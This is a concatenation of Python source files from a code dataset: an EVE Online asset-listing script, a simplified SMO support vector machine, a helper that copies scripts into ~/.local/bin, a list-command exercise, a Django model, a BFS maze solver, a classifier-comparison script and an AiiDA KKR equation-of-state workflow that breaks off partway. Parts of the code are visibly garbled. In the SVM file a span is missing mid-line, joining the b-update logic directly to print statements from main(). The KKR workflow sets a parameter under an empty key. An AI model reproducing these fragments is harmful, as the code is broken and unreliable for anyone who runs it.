web flow.\"\"\"\n\n access_token_file = open(\"access_token.txt\", \"r\")\n character_id_file = open(\"character_id.txt\", \"r\")\n\n token = access_token_file.read()\n character_id = character_id_file.read()\n\n headers = {\n \"Authorization\": \"Bearer {}\".format(token)\n }\n\n blueprint_path = (\"https://esi.evetech.net/latest/characters/{}/assets/\".format(character_id))\n res = requests.get(blueprint_path, headers=headers)\n json = res.json()\n for item in json:\n if item['location_flag'] == \"Cargo\":\n print(\"CARGO: \" + _get_type_id(item['type_id'])['name'])\n else:\n print(item)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"app/Eve.py","file_name":"Eve.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"278025414","text":"\n# Support Vector Machine: SMO\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io as scio\nfrom sklearn.svm import LinearSVC\n\n\n# Calculates the dual of the Error\ndef dual(K, y, b, alpha, i):\n temp = np.multiply(alpha, y)\n return temp.T * K[:, i] + b\n\n\n# Computes Eta value\ndef compute_eta(i, j, K):\n return 2 * K[i, j] - K[i, i] - K[j, j]\n\n\n# Helper to calculate new alphaj value\ndef new_alphaj_value(alpha, y, Ei, Ej, eta, L, H):\n temp = alpha - (y * (Ei - Ej)) / eta\n if temp > H:\n return H\n elif temp < L:\n return L\n else:\n return temp\n\n\n# Helper to compute b\ndef compute_b(b1, b2, alphai, alphaj, C):\n if 0 < alphai and alphai < C:\n return b1\n elif 0 < alphaj and alphaj < C:\n return b2\n else:\n return (b1 + b2) / 2\n\n\n# Simplified smo algorithm\ndef smo(X, y, C, tolerance, max_passes, K):\n X = X[: , 1:]\n alpha = np.matrix(np.zeros(X.shape[0]))\n alpha = alpha.T\n b = 0\n passes = 0\n while passes < max_passes:\n num_changed_alphas = 0\n for i in range(len(X)):\n Ei = dual(K, y, b, alpha, i) - y[i]\n if (y[i] * Ei < -tolerance and alpha[i] < C) or (y[i] * Ei > tolerance and alpha[i] > 0):\n j = np.random.choice(len(X))\n while j == i:\n j = np.random.choice(len(X))\n\n Ej = dual(K, y, b, alpha, j) - y[j]\n old_alpha_i = alpha.item(i)\n old_alpha_j = alpha.item(j)\n\n if y[i] != y[j]:\n L = max(0, alpha[j] - alpha[i])\n H = min(C, C + alpha[j] - alpha[i])\n else:\n L = max(0, alpha[i] + alpha[j] - C)\n H = min(C, alpha[i] + alpha[j])\n\n if L == H:\n continue\n\n eta = compute_eta(i, j, K)\n if eta >= 0:\n continue\n\n alpha[j] = new_alphaj_value(alpha[j], y[j], Ei, Ej, eta, L, H)\n\n if abs(alpha[j] - old_alpha_j) < 0.00001:\n continue\n\n alpha[i] = alpha[i] + (y[i] * y[j] * (old_alpha_j - alpha[j]))\n\n# # Compute b1 and b2\n# b_1 = b - Ei - y[i]*(alpha[i] - old_alpha_i)* K[i,i] - y[j] *(alpha[j] - old_alpha_j)*K[i,j]\n# b_2 = b - Ej - y[i]*(alpha[i] - old_alpha_i)* K[i,j] - y[j] *(alpha[j] - old_alpha_j)*K[j,j]\n\n# b = b_1 if (alpha[i]>0 and alpha[i]0 and alpha[j]\")\n print(\"FOR TRAINING SET\")\n classification_error_print(X_train, y_train, theta_smo)\n\n print()\n print(\"FOR TRAINING SET\")\n classification_error_print(X_test, y_test, theta_smo)\n\n # Plots prediction\n plotPrediction(X_train, y_train, theta_smo, \"training set\")\n plotPrediction(X_test, y_test, theta_smo, \"test set\")\n\n #SKLEARN\n clf = LinearSVC(random_state=0)\n clf.fit(X_train, y_train)\n clf.score(X_train, y_train)\n print()\n print(\"<---------------CLASSIFICATION USING SKLEARN SVM--------------->\")\n print(\"FOR TRAINING SET\")\n classification_error_print_sklearn(clf, X_train, y_train)\n print()\n print(\"FOR TRAINING SET\")\n classification_error_print_sklearn(clf, X_test, y_test)\n theta_smo_sklearn = clf.coef_\n\n plotPrediction(X_train, y_train, theta_smo_sklearn, \"train set\")\n plotPrediction(X_test, y_test, theta_smo_sklearn, \"test set\")\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"SVM/SVMsmo.py","file_name":"SVMsmo.py","file_ext":"py","file_size_in_byte":8250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"341027994","text":"#!/usr/bin/env python\nimport sys\nimport subprocess\nfrom os.path import expanduser\n\nif len(sys.argv) == 3:\n if sys.argv[1] == \"add\":\n f = sys.argv[2]\n if '.' in f:\n dest = f[:f.find('.')]\n else:\n dest = f\n\n commands = [\n [\"chmod\", \"+x\", f],\n [\"cp\", f, expanduser(\"~/.local/bin/\")+dest]\n ]\n for command in commands:\n subprocess.run(command)\n elif sys.argv[1] == \"del\":\n f = sys.argv[2]\n command = [\"rm\", expanduser(\"~/.local/bin/\")+f]\n subprocess.run(command)\nelse:\n print(\"This command need 2 arguments: option and file\")\n print(\"options:\")\n print(\"add \\t add file to path\")\n print(\"del \\t delete file from path\")\n","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171073601","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 15 10:31:21 2019\r\n\r\n@author: swang\r\n\r\nConsider a list (list = []). You can perform the following commands:\r\n\r\ninsert i e: Insert integer at position .\r\nprint: Print the list.\r\nremove e: Delete the first occurrence of integer .\r\nappend e: Insert integer at the end of the list.\r\nsort: Sort the list.\r\npop: Pop the last element from the list.\r\nreverse: Reverse the list.\r\nInitialize your list and read in the value of followed by lines of commands where each command will be of the types listed above. \r\nIterate through each command in order and perform the corresponding operation on your list.\r\n\r\nInput Format:\r\nThe first line contains an integer, , denoting the number of commands. \r\nEach line of the subsequent lines contains one of the commands described above.\r\n\r\nConstraints:\r\nThe elements added to the list must be integers.\r\nOutput Format\r\n\r\nFor each command of type print, print the list on a new line.\r\n\"\"\"\r\n\r\n# Enter the number of lines\r\nif __name__ == '__main__':\r\n N = int(input())\r\n\r\n# Make a new list\r\nmyList=[]\r\n\r\n# For each line do the following:\r\nfor row in range(N):\r\n # split the line into a new list \"line\" and extract the information depending on the length\r\n # command is always at [0]\r\n line=input().split()\r\n if len(line)==1:\r\n command=line[0]\r\n elif len(line)==2:\r\n command=line[0]\r\n e=int(line[1])\r\n elif len(line)==3:\r\n command=line[0]\r\n i=int(line[1])\r\n e=int(line[2])\r\n\r\n # based on each command, do the corresponding thing\r\n if command=='insert':\r\n myList.insert(i,e)\r\n elif command=='print':\r\n print(myList)\r\n elif command=='remove':\r\n myList.remove(e)\r\n elif command=='append':\r\n myList.append(e)\r\n elif command=='sort':\r\n myList.sort()\r\n elif command=='pop' and len(line)>=1:\r\n myList.pop()\r\n elif command=='reverse':\r\n myList.reverse()\r\n","sub_path":"Python/ListCommand.py","file_name":"ListCommand.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91508445","text":"from django.db import models\n# from django.contrib.auth.models import User\n\n# Create your models here.\nclass Terminal(models.Model):\n\n CONNECTION_STATUS = (('Connected', 'Connected'),\n ('Ready', 'Ready'))\n\n id = models.AutoField(primary_key=True)\n\n event = models.ForeignKey( 'event.Event',\n null=True,\n on_delete=models.SET_NULL,\n default='')\n\n status = models.CharField( max_length=30,\n choices=CONNECTION_STATUS,\n default='Connected',\n null=False,\n blank=False)\n\n address = models.CharField( max_length=30,\n null=False,\n blank=False,\n unique=True)\n class Meta:\n ordering = [\"id\"]\n\n def __str__(self):\n \"\"\"\n String for representing the Model object (in Admin site etc.)\n \"\"\"\n return self.address\n","sub_path":"eHall/api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"146490390","text":"from collections import deque\n\n# 미로 탈출\n\n# N, M을 공백을 기준으로 구분하여 입력 받기\nn,m = map(int, input().split())\n\ngraph = []\nfor _ in range(n):\n graph.append(list(map(int, input())))\n\ndx = [-1,1,0,0]\ndy = [0,0,-1,1]\n\ndef bfs (x,y):\n queue = deque()\n queue.append((x,y))\n\n while queue:\n x, y = queue.popleft()\n\n for i in range(4):\n vx = x + dx[i]\n vy = y + dy[i]\n \n if (vx < 0 or vx >= n or vy < 0 or vy >= m) :\n continue\n if graph[vx][vy] == 0:\n continue\n if graph[vx][vy] == 1:\n graph[vx][vy] = graph[x][y] + 1\n queue.append((vx,vy))\n\n return graph[n-1][m-1]\n\nprint(bfs(0,0))\n","sub_path":"textbook/bfs01.py","file_name":"bfs01.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"101239244","text":"import pandas as pd\nimport Classifiers as NN\nimport matplotlib.pyplot as plt\n\ndef get_dataset1():\n \"\"\"Retrieve the kuwait dataset and process the data.\"\"\"\n # Set defaults.\n filename = \"Kuwait.xlsx\"\n df = pd.read_excel(filename, 'DataSet2', header= 0, usecols=\"B:X\")\n dm = pd.read_excel(filename, 'DataSet2', header= 0, usecols=\"AF\")\n X = df.values\n Y = dm.values\n input_shape = 23\n return X, Y, input_shape\n\n\ndef get_dataset2():\n \"\"\"Retrieve the gcc dataset and process the data.\"\"\"\n # Set defaults.\n filename = \"FinancialData.xlsx\"\n df = pd.read_excel(filename, 'DataSet2', header=0, usecols=\"B:R\")\n dm = pd.read_excel(filename, 'DataSet2', header=0, usecols=\"Y\")\n X = df.values\n Y = dm.values\n input_shape = 17\n return X, Y, input_shape\n\n\nX, Y, Input_shape = get_dataset1()\nD1_MV_accuracy, D1_MV_f1score = NN.Accuracy_MV(X, Y)\nprint(\"MV Dataset1: \", D1_MV_accuracy, D1_MV_f1score)\nD1_RF_accuracy, D1_RF_f1score = NN.Accuracy_RF(X, Y)\nprint(\"RF Dataset1: \", D1_RF_accuracy, D1_RF_f1score)\nD1_ADA_accuracy, D1_ADA_f1score = NN.Accuracy_Adaboost(X, Y)\nprint(\"Adaboost Dataset1: \", D1_ADA_accuracy, D1_ADA_f1score)\nD1_DT_accuracy, D1_DT_f1score = NN.Accuracy_DT(X, Y)\nprint(\"DT Dataset1: \", D1_DT_accuracy, D1_DT_f1score)\nD1_SVM_accuracy, D1_SVM_f1score = NN.Accuracy_SVM(X, Y)\nprint(\"SVM Dataset1: \", D1_SVM_accuracy, D1_SVM_f1score)\nD1_NN_accuracy, D1_NN_f1score = (NN.Accuracy_NN(X, Y))\nprint(\"NN Dataset1: \", D1_NN_accuracy, D1_NN_f1score)\n\nX, Y, Input_shape = get_dataset2()\nD2_MV_accuracy, D2_MV_f1score = NN.Accuracy_MV(X, Y)\nprint(\"MV Dataset2: \", D2_MV_accuracy, D2_MV_f1score)\nD2_RF_accuracy, D2_RF_f1score = NN.Accuracy_RF(X, Y)\nprint(\"RF Dataset2: \", D2_RF_accuracy, D2_RF_f1score)\nD2_ADA_accuracy, D2_ADA_f1score = NN.Accuracy_Adaboost(X, Y)\nprint(\"Adaboost Dataset2: \", D2_ADA_accuracy, D2_ADA_f1score)\nD2_DT_accuracy, D2_DT_f1score = NN.Accuracy_DT(X, Y)\nprint(\"DT Dataset2: \", D2_DT_accuracy, D2_DT_f1score)\nD2_SVM_accuracy, D2_SVM_f1score = NN.Accuracy_SVM(X, Y)\nprint(\"SVM Dataset2: \", D2_SVM_accuracy, D2_SVM_f1score)\nD2_NN_accuracy, D2_NN_f1score = NN.Accuracy_NN(X, Y)\nprint(\"NN Dataset2: \", D2_NN_accuracy, D2_NN_f1score)\n\ndataset = (\"Dataset1\", \"Dataset2\")\nmodels = (\"NN\", \"DT\", \"SVM\", \"MV\", \"RF\", \"Adaboost\")\nDataset1_Accuracy = (D1_NN_accuracy, D1_DT_accuracy, D1_SVM_accuracy, D1_MV_accuracy, D1_RF_accuracy, D1_ADA_accuracy)\nDataset2_Accuracy = (D2_NN_accuracy, D2_DT_accuracy, D2_SVM_accuracy, D2_MV_accuracy, D2_RF_accuracy, D2_ADA_accuracy)\nDataset1_f1score = (D1_NN_f1score, D1_DT_f1score, D1_SVM_f1score, D1_MV_f1score, D1_RF_f1score, D1_ADA_f1score)\nDataset2_f1score = (D2_NN_f1score, D2_DT_f1score, D2_SVM_f1score, D2_MV_f1score, D2_RF_f1score, D2_ADA_f1score)\n\n\nfig, ax = plt.subplots()\nax.plot(models, Dataset1_Accuracy, color='r', marker='o', linestyle='--', markersize=5, label='Dataset1')\nax.plot(models, Dataset2_Accuracy, color='b', marker='o', linestyle='--', markersize=5, label=\"DataSet2\")\n\nlegend = ax.legend(loc='lower right', shadow=True)\n\ndata = [[format(D1_NN_accuracy, '.2f'), format(D2_NN_accuracy, '.2f')], [format(D1_DT_accuracy, '.2f'), format(D2_DT_accuracy, '.2f')], [format(D1_SVM_accuracy, '.2f'), format(D2_SVM_accuracy, '.2f')], [format(D1_MV_accuracy, '.2f'), format(D2_MV_accuracy, '.2f')],[format(D1_RF_accuracy, '.2f'), format(D2_RF_accuracy, '.2f')], [format(D1_ADA_accuracy, '.2f'), format(D2_ADA_accuracy, '.2f')]]\nprint(\"\\033[33m\\nAccuracy Table(Classification\\Train:Test Ratio)\\n\", pd.DataFrame(data, models, dataset))\n\nplt.ylim([20,100])\nplt.xlabel(\"Classifier Model\")\nplt.ylabel(\"Mean Accuracy\")\nplt.title(\"Accuracy of Machine Learning Classifiers on FDP\")\nplt.show()\n\nfig, ax = plt.subplots()\nax.plot(models, Dataset1_f1score, color='r', marker='o', linestyle='--', markersize=5, label='Dataset1')\nax.plot(models, Dataset2_f1score, color='b', marker='o', linestyle='--', markersize=5, label=\"DataSet2\")\n\nlegend = ax.legend(loc='lower right', shadow=True)\n\ndata = [[format(D1_NN_f1score, '.2f'), format(D2_NN_f1score, '.2f')], [format(D1_DT_f1score, '.2f'), format(D2_DT_f1score, '.2f')], [format(D1_SVM_f1score, '.2f'), format(D2_SVM_f1score, '.2f')], [format(D1_MV_f1score, '.2f'), format(D2_MV_f1score, '.2f')],[format(D1_RF_f1score, '.2f'), format(D2_RF_f1score, '.2f')], [format(D1_ADA_f1score, '.2f'), format(D2_ADA_f1score, '.2f')]]\nprint(\"\\033[33m\\nAccuracy Table(Classification\\Train:Test Ratio)\\n\", pd.DataFrame(data, models, dataset))\n\nplt.ylim([20,100])\nplt.xlabel(\"Classifier Model\")\nplt.ylabel(\"Mean F1-score\")\nplt.title(\"F1-Score of Machine Learning Classifiers on FDP\")\nplt.show()\n\n","sub_path":"Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"346088224","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nIn this module you find the base workflow for a EOS calculation and\nsome helper methods to do so with AiiDA\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom aiida.orm import Code, load_node\nfrom aiida.plugins import DataFactory\nfrom aiida.orm import Float, Bool\nfrom aiida.engine import WorkChain, ToContext\nfrom aiida.engine import calcfunction\nfrom aiida_kkr.calculations.kkr import KkrCalculation\nfrom aiida_kkr.calculations.voro import VoronoiCalculation\nfrom aiida_kkr.tools.common_workfunctions import update_params_wf\nfrom aiida_kkr.workflows.voro_start import kkr_startpot_wc\nfrom aiida_kkr.workflows.kkr_scf import kkr_scf_wc\nfrom masci_tools.io.kkr_params import kkrparams\nfrom masci_tools.io.common_functions import get_Ry2eV\nfrom ase.eos import EquationOfState\nfrom numpy import array, mean, std, min, sort\nfrom six.moves import range\n\n\n__copyright__ = (u\"Copyright (c), 2018, Forschungszentrum Jülich GmbH, \"\n \"IAS-1/PGI-1, Germany. All rights reserved.\")\n__license__ = \"MIT license, see LICENSE.txt file\"\n__version__ = \"0.8.1\"\n__contributors__ = u\"Philipp Rüßmann\"\n\n\nRemoteData = DataFactory('remote')\nStructureData = DataFactory('structure')\nDict = DataFactory('dict')\n\nclass kkr_eos_wc(WorkChain):\n \"\"\"\n Workchain of an equation of states calculation with KKR.\n\n Layout of the workflow:\n 1. determine V0, scale_range, etc. from input\n 2. run voro_start for V0 and smallest volume\n 2.1 get minimum for RMTCORE (needs to be fixed for all calculations to be able to compare total energies\n 3. submit kkr_scf calculations for all volumes using RMTCORE setting determined in step 2\n 4. collect results\n \"\"\"\n\n _workflowversion = __version__\n _wf_label = 'kkr_eos_wc_{}' # replace with structure formula\n _wf_description = 'Equation of states workflow for {} using KKR' # replace with structure formula\n # workflow options (computer settings)\n _options_default = {'queue_name' : '', # Queue name to submit jobs too\n 'resources': {\"num_machines\": 1}, # resources to allocate for the job\n 'max_wallclock_seconds' : 60*60, # walltime in seconds after which the job gets killed (gets parsed to KKR)\n 'use_mpi' : True, # execute KKR with mpi or without\n 'custom_scheduler_commands' : '' # some additional scheduler commands (e.g. project numbers in job scripts, OpenMP settings, ...)\n }\n # workflow settings\n _wf_default = {'scale_range' : [0.94, 1.06], # range around volume of starting structure which eos is computed\n 'nsteps': 7, # number of calculations around\n 'ground_state_structure': True, # create and return a structure which has the ground state volume determined by the fit used\n 'use_primitive_structure': True, # use seekpath to get primitive structure after scaling to reduce computational time\n 'fitfunction': 'birchmurnaghan', # fitfunction used to determine ground state volume (see ase.eos.EquationOfState class for details)\n 'settings_kkr_startpot': kkr_startpot_wc.get_wf_defaults(silent=True), # settings for kkr_startpot behavior\n 'settings_kkr_scf': kkr_scf_wc.get_wf_defaults(silent=True) # settings for kkr_scf behavior\n }\n # change _wf_default of kkr_scf to deactivate DOS runs\n _wf_default['settings_kkr_scf']['check_dos'] = False\n\n @classmethod\n def get_wf_defaults(self, silent=False):\n \"\"\"\n Print and return _wf_defaults dictionary. Can be used to easily create set of wf_parameters.\n returns _wf_defaults, _options_default\n \"\"\"\n if not silent: print('Version of workflow: {}'.format(self._workflowversion))\n return self._wf_default, self._options_default\n\n\n @classmethod\n def define(cls, spec):\n \"\"\"\n Defines the outline of the workflow.\n \"\"\"\n # Take input of the workflow or use defaults defined above\n super(kkr_eos_wc, cls).define(spec)\n spec.input(\"options\", valid_type=Dict, required=False, # computer options\n default=Dict(dict=cls._options_default))\n spec.input(\"wf_parameters\", valid_type=Dict, required=False, # workfunction settings\n default=Dict(dict=cls._wf_default))\n spec.input(\"kkr\", valid_type=Code, required=True) # KKRhost code\n spec.input(\"voronoi\", valid_type=Code, required=True) # voronoi code\n spec.input(\"structure\", valid_type=StructureData, required=True) # starting structure node\n spec.input(\"calc_parameters\", valid_type=Dict, required=False) # KKR input parameters (lmax etc.)\n\n # define output nodes\n spec.output(\"eos_results\", valid_type=Dict, required=True)\n spec.output(\"gs_structure\", valid_type=StructureData, required=False)\n spec.output(\"explicit_kpoints\", required=False)\n spec.output(\"get_explicit_kpoints_path_parameters\", valid_type=Dict, required=False)\n\n # Here the structure of the workflow is defined\n spec.outline(\n # 1. initialize workflow and check input consistency\n cls.start,\n # 2. prepare structures\n cls.prepare_strucs,\n # 3. run voronoi calculation for smallest volume0\n cls.run_vorostart,\n # 4. check voronoi output and extract RMTCORE parameter\n cls.check_voro_out,\n # 5. submit KKR calculations for all steps\n cls.run_kkr_steps,\n # 6. collect output and fit results\n cls.collect_data_and_fit,\n # 7. collect and return output nodes\n cls.return_results\n )\n\n # ToDo: improve error codes\n spec.exit_code(221, 'ERROR_INVALID_INPUT',\n message=\"ERROR: inputs invalid\")\n spec.exit_code(222, 'ERROR_NOT_ENOUGH_SUCCESSFUL_CALCS',\n message='ERROR: need at least 3 successful calculations')\n spec.exit_code(223, 'ERROR_NSTEPS_TOO_SMALL',\n message='ERROR: nsteps is smaller than 3, need at least three data points to do fitting')\n spec.exit_code(224, 'ERROR_INVALID_FITFUN',\n message='given fitfunction name not valid')\n spec.exit_code(225, 'ERROR_VOROSTART_NOT_SUCCESSFUL',\n message='ERROR: kkr_startpot was not successful. Check you inputs.')\n\n\n def start(self):\n \"\"\"\n initialize context and check input nodes\n \"\"\"\n\n self.report('INFO: starting KKR eos workflow version {}'.format(self._workflowversion))\n\n # now extract information from input nodes\n try:\n self.ctx.wf_options = self.inputs.get('options').get_dict()\n self.ctx.wf_parameters = self.inputs.get('wf_parameters').get_dict()\n self.ctx.kkr = self.inputs.get('kkr') #TODO: check if code is KKR code\n self.ctx.voro = self.inputs.get('voronoi') #TODO: check if code is voronoi code\n self.ctx.structure = self.inputs.get('structure')\n self.ctx.calc_parameters = self.inputs.get('calc_parameters') # optional, TODO: needs to be filled with defaults if not present\n except:\n # in case of failure, exit workflow here\n return self.exit_codes.ERROR_INVALID_INPUT\n\n # add label and description if not given (contains structure name)\n #if self.label is None:\n self.ctx.label = self._wf_label.format(self.ctx.structure.get_formula())\n #if self.description is None:\n self.ctx.description = self._wf_description.format(self.ctx.structure.get_formula())\n if self.ctx.wf_parameters['settings_kkr_startpot'].get('_label', None) is None:\n self.ctx.wf_parameters['settings_kkr_startpot']['_label'] = self.ctx.label+'_kkr_startpot_{}'.format(self.ctx.structure.get_formula())\n if self.ctx.wf_parameters['settings_kkr_startpot'].get('_description', None) is None:\n self.ctx.wf_parameters['settings_kkr_startpot']['_description'] = self.ctx.description+' kkr_startpot step for {}'.format(self.ctx.structure.get_formula())\n if self.ctx.wf_parameters['settings_kkr_scf'].get('label', None) is None:\n self.ctx.wf_parameters['settings_kkr_scf']['label'] = self.ctx.label+'_kkr_scf_{}'.format(self.ctx.structure.get_formula())\n if self.ctx.wf_parameters['settings_kkr_scf'].get('description', None) is None:\n self.ctx.wf_parameters['settings_kkr_scf']['description'] = self.ctx.description+' kkr_scf step for {}'.format(self.ctx.structure.get_formula())\n\n # initialize some other things used to collect results etc.\n self.ctx.successful = True\n self.ctx.warnings = []\n self.ctx.rms_threshold = self.ctx.wf_parameters['settings_kkr_scf'].get('convergence_criterion', 10**-7)\n self.ctx.nsteps = self.ctx.wf_parameters.get('nsteps')\n self.ctx.scale_range = self.ctx.wf_parameters.get('scale_range')\n self.ctx.fitfunc_gs_out = self.ctx.wf_parameters.get('fitfunction') # fitfunction used to get ground state structure\n self.ctx.return_gs_struc = self.ctx.wf_parameters.get('ground_state_structure') # boolean, return output structure or not\n self.ctx.use_primitive_structure = self.ctx.wf_parameters.get('use_primitive_structure')\n self.ctx.scaled_structures = [] # filled in prepare_strucs\n self.ctx.fitnames = ['sj', 'taylor', 'murnaghan', 'birch', 'birchmurnaghan', 'pouriertarantola', 'vinet', 'antonschmidt', 'p3'] # list of allowed fits\n self.ctx.sub_wf_ids = {} # filled with workflow uuids\n\n # check input\n if self.ctx.nsteps<3:\n self.exit_codes.ERROR_NSTEPS_TOO_SMALL\n if self.ctx.fitfunc_gs_out not in self.ctx.fitnames:\n self.exit_codes.ERROR_INVALID_FITFUN\n\n # set scale_factors from scale_range and nsteps\n self.ctx.scale_factors = []\n for i in range(self.ctx.nsteps):\n scale_fac = self.ctx.scale_range[0]+i*(self.ctx.scale_range[1]-self.ctx.scale_range[0])/(self.ctx.nsteps-1)\n self.ctx.scale_factors.append(scale_fac)\n\n\n def prepare_strucs(self):\n \"\"\"\n create new set of scaled structures using the 'rescale' workfunction (see end of the workflow)\n \"\"\"\n for scale_fac in self.ctx.scale_factors:\n scaled_structure = rescale(self.ctx.structure, Float(scale_fac))\n if self.ctx.use_primitive_structure:\n scaled_structure = get_primitive_structure(scaled_structure, Bool(False))\n self.ctx.scaled_structures.append(scaled_structure)\n\n\n def run_vorostart(self):\n \"\"\"\n run vorostart workflow for smallest structure to determine rmtcore setting for all others\n \"\"\"\n wfd = kkr_startpot_wc.get_wf_defaults(silent=True)\n set_keys = []\n # first set options\n for key in list(self.ctx.wf_options.keys()):\n wfd[key] = self.ctx.wf_options.get(key)\n set_keys.append(key)\n # then set ef_settings\n vorostart_settings = self.ctx.wf_parameters.get('settings_kkr_startpot')\n for key in list(vorostart_settings.keys()):\n if key not in set_keys: # skip setting of options (done above already)\n wfd[key] = vorostart_settings[key]\n scaled_struc = self.ctx.scaled_structures[0]\n future = self.submit(kkr_startpot_wc, structure=scaled_struc, kkr=self.ctx.kkr,\n voronoi=self.ctx.voro, wf_parameters=Dict(dict=wfd),\n calc_parameters=self.ctx.calc_parameters,\n options=Dict(dict=self.ctx.wf_options))\n\n self.report('INFO: running kkr_startpot workflow (pk= {})'.format(future.pk))\n self.ctx.sub_wf_ids['kkr_startpot_1'] = future.uuid\n\n return ToContext(kkr_startpot=future)\n\n\n def check_voro_out(self):\n \"\"\"\n check outout of vorostart workflow and create input for rest of calculations (rmtcore setting etc.)\n \"\"\"\n self.report('INFO: checking voronoi output')\n # get output of kkr_startpot\n out_wc = self.ctx.kkr_startpot\n try:\n res = out_wc.outputs.results_vorostart_wc\n voro_params = out_wc.outputs.last_params_voronoi\n smallest_voro_remote = out_wc.outputs.last_voronoi_remote\n smallest_voro_results = out_wc.outputs.last_voronoi_results\n vorostart_success = res.get_dict()['successful']\n except:\n vorostart_success = False\n\n if vorostart_success:\n rmt = []\n radii = smallest_voro_results.get_dict()['radii_atoms_group']\n for rad_iatom in radii:\n if 'rmt0' in list(rad_iatom.keys()):\n rmt.append(rad_iatom['rmt0'])\n rmtcore_min = array(rmt) * smallest_voro_results.get_dict().get('alat') # needs to be mutiplied by alat in atomic units!\n self.report('INFO: extracted rmtcore_min ({})'.format(rmtcore_min))\n else:\n return self.exit_codes.ERROR_VOROSTART_NOT_SUCCESSFUL\n\n # update parameter node with rmtcore setting\n voro_params_with_rmtcore = kkrparams(**voro_params.get_dict())\n voro_params_with_rmtcore.set_value('', rmtcore_min)\n voro_params_with_rmtcore_dict = voro_params_with_rmtcore.get_dict()\n voro_params_with_rmtcore = update_params_wf(voro_params, Dict(dict=voro_params_with_rmtcore_dict))\n self.report('INFO: updated kkr_parameters inlcuding RMTCORE setting (uuid={})'.format(voro_params_with_rmtcore.uuid))\n\n # store links to context\n self.ctx.params_kkr_run=voro_params_with_rmtcore\n self.ctx.smallest_voro_remote=smallest_voro_remote\n\n\n def run_kkr_steps(self):\n \"\"\"\n submit KKR calculations for all structures, skip vorostart step for smallest structure\n \"\"\"\n\n self.report('INFO: running kkr scf steps')\n # params for scf wfd\n wfd = kkr_scf_wc.get_wf_defaults(silent=True)\n set_keys = []\n # first set options\n for key in list(self.ctx.wf_options.keys()):\n wfd[key] = self.ctx.wf_options.get(key)\n set_keys.append(key)\n # then set ef_settings\n kkr_scf_settings = self.ctx.wf_parameters.get('settings_kkr_scf')\n for key in list(kkr_scf_settings.keys()):\n if key not in set_keys: # skip setting of options (done above already)\n wfd[key] = kkr_scf_settings[key]\n\n # used to collect all submitted calculations\n calcs = {}\n\n # submit first calculation separately\n self.report('submit calc for scale fac= {} on {}'.format(self.ctx.scale_factors[0], self.ctx.scaled_structures[0].get_formula()))\n future = self.submit(kkr_scf_wc, kkr=self.ctx.kkr, remote_data=self.ctx.smallest_voro_remote,\n wf_parameters=Dict(dict=wfd), calc_parameters=self.ctx.params_kkr_run,\n options=Dict(dict=self.ctx.wf_options))\n scale_fac = self.ctx.scale_factors[0]\n calcs['kkr_{}_{}'.format(1, scale_fac)] = future\n self.ctx.sub_wf_ids['kkr_scf_1'] = future.uuid\n\n # then also submit the rest of the calculations\n for i in range(len(self.ctx.scale_factors)-1):\n scale_fac = self.ctx.scale_factors[i+1]\n scaled_struc = self.ctx.scaled_structures[i+1]\n self.report('submit calc for scale fac= {} on {}'.format(scale_fac, scaled_struc.get_formula()))\n future = self.submit(kkr_scf_wc, structure=scaled_struc, kkr=self.ctx.kkr, voronoi=self.ctx.voro,\n wf_parameters=Dict(dict=wfd), calc_parameters=self.ctx.params_kkr_run,\n options=Dict(dict=self.ctx.wf_options))\n calcs['kkr_{}_{}'.format(i+2, scale_fac)] = future\n self.ctx.sub_wf_ids['kkr_scf_{}'.format(i+2)] = future.uuid\n\n # save uuids of calculations to context\n self.ctx.kkr_calc_uuids = []\n for name in sort(list(calcs.keys())): # sorting important to have correct assignment of scaling and structure info later on\n calc = calcs[name]\n self.ctx.kkr_calc_uuids.append(calc.uuid)\n\n self.report('INFO: submitted calculations: {}'.format(calcs))\n\n return ToContext(**calcs)\n\n\n def collect_data_and_fit(self):\n \"\"\"\n collect output of KKR calculations and perform eos fitting to collect results\n \"\"\"\n self.report('INFO: collect kkr results and fit data')\n calc_uuids = self.ctx.kkr_calc_uuids\n etot = []\n for iic in range(len(calc_uuids)):\n uuid = calc_uuids[iic]\n n = load_node(uuid)\n try:\n d_result = n.outputs.output_kkr_scf_wc_ParameterResults.get_dict()\n self.report('INFO: extracting output of calculation {}: successful={}, rms={}'.format(uuid, d_result[u'successful'], d_result[u'convergence_value']))\n if d_result[u'successful']:\n pk_last_calc = d_result['last_calc_nodeinfo']['pk']\n n2 = load_node(pk_last_calc)\n scale = self.ctx.scale_factors[iic]\n ener = n2.outputs.output_parameters.get_dict()['total_energy_Ry']\n rms = d_result[u'convergence_value']\n scaled_struc = self.ctx.scaled_structures[iic]\n v = scaled_struc.get_cell_volume()\n if rms<=self.ctx.rms_threshold: # only take those calculations which\n etot.append([scale, ener, v, rms])\n else:\n warn = 'rms of calculation with uuid={} not low enough ({} > {})'.format(uuid, rms, self.ctx.rms_threshold)\n self.report('WARNING: {}'.format(warn))\n self.ctx.warnings.append(warn)\n except:\n warn = 'calculation with uuid={} not successful'.format(uuid)\n self.report('WARNING: {}'.format(warn))\n self.ctx.warnings.append(warn)\n\n\n # collect calculation outcome\n etot = array(etot)\n self.report('INFO: collected data from calculations= {}'.format(etot))\n\n # check if at least 